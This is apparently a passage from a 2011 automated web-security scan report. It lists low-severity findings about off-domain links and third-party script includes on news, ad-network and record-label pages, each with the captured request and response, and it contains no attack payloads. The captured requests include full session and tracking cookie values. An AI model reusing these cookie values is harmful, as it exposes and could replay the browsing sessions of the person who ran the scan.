<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

15.40. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=samoa&date=2011-5-9&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=SAd3ES8aFMFPPf9yKZ4t7oOXPDdsYBJulc84HWgSlZSZMSWL_m54PWT4b5AVWjuTnETTdph0uW3CVEHcwezP5Pp-rs1cZ83iLv9ixDxoHqK3BtOdYIU7TwLQBvqocehV

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2011 14:00:24 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11160

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: samoa, May 9, 2011</titl
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://apuntes-urbanos.blogspot.com/2011/05/samoa-volver-al-futuro.html" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://apuntes-urbanos.blogspot.com/" target="_blank"> http://apuntes-urbanos.blogspot.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://blogs.nature.com/news/2009/10/briefing_earthquakes_in_sumatr.html" target="_blank">
News Blog: Briefing: Earthquakes in Sumatra and <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://blogs.nature.com/news/thegreatbeyond/" target="_blank"> http://blogs.nature.com/news/thegreatbeyond/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.ecademy.com/node.php?id=163891" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.ecademy.com/module.php?mod=blog" target="_blank"> http://www.ecademy.com/module.php?mod=blog</a>
...[SNIP]...

15.41. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=sufjan+stevens&date=2011-5-9&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=SAd3ES8aFMFPPf9yKZ4t7oOXPDdsYBJulc84HWgSlZSZMSWL_m54PWT4b5AVWjuTnETTdph0uW3CVEHcwezP5Pp-rs1cZ83iLv9ixDxoHqK3BtOdYIU7TwLQBvqocehV

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2011 14:00:03 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11181

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: sufjan stevens, May 9, 2
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.fullissue.com/index.php/sufjan-stevens-biography-1975.html" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.fullissue.com/" target="_blank"> http://www.fullissue.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://thesilvertongueonline.com/?p=26978" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://thesilvertongueonline.com/" target="_blank"> http://thesilvertongueonline.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://tuneoftheday.blogspot.com/2011/05/sufjan-stevens-futile-devices.html" target="_blank">
Tune Of The Day: <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://tuneoftheday.blogspot.com/" target="_blank"> http://tuneoftheday.blogspot.com/</a>
...[SNIP]...

15.42. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /hive/common/includes/google-adsense-content-orlnews.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /hive/common/includes/google-adsense-content-orlnews.html?client=ca-tribune_news3_html&google_ad_channel=Orlandosentinel_story_pos1&type=wide&page_url=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,2290449,print.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business; __switchTo5x=97; __unam=23536f-12fd50e4220-5f39d80-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Expires: Mon, 09 May 2011 13:59:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Google Ads</title>
<link href="/hive/stylesheets/sponsoredlinks-orlnews.css" media="all
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

16. Cross-domain script include
There are 30 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement that a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons), then you should consider reimplementing the script's functionality within your own code.


16.1. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2724.Centro.com/B5245176.26

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5697
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:08 GMT
Expires: Mon, 09 May 2011 13:59:08 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon May 02 13:59:37 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</script>
<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>

16.2. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7033

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri May 06 13:07:08 EDT 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://cdn.doubleverify.com/script152.js?agnc=563308&cmp=5229711&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=63617239&advid=998766&sid=327761&adid="></script>
...[SNIP]...

16.3. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; 
rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="...[SNIP]..."; rsi_segs_1000000=...[SNIP]...; rtc_Wdkl=...[SNIP]...; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages"><'+'/script>
...[SNIP]...

16.4. http://asthmatickitty.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...
<meta http-equiv="Cache-Control" content="no-cache" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.validate.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.form.js"></script>
...[SNIP]...

16.5. http://asthmatickitty.com/news.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...
<meta http-equiv="Cache-Control" content="no-cache" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.validate.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.form.js"></script>
...[SNIP]...

16.6. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCm55_uBBCm55_uBBgB

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:03:50 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>

16.7. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

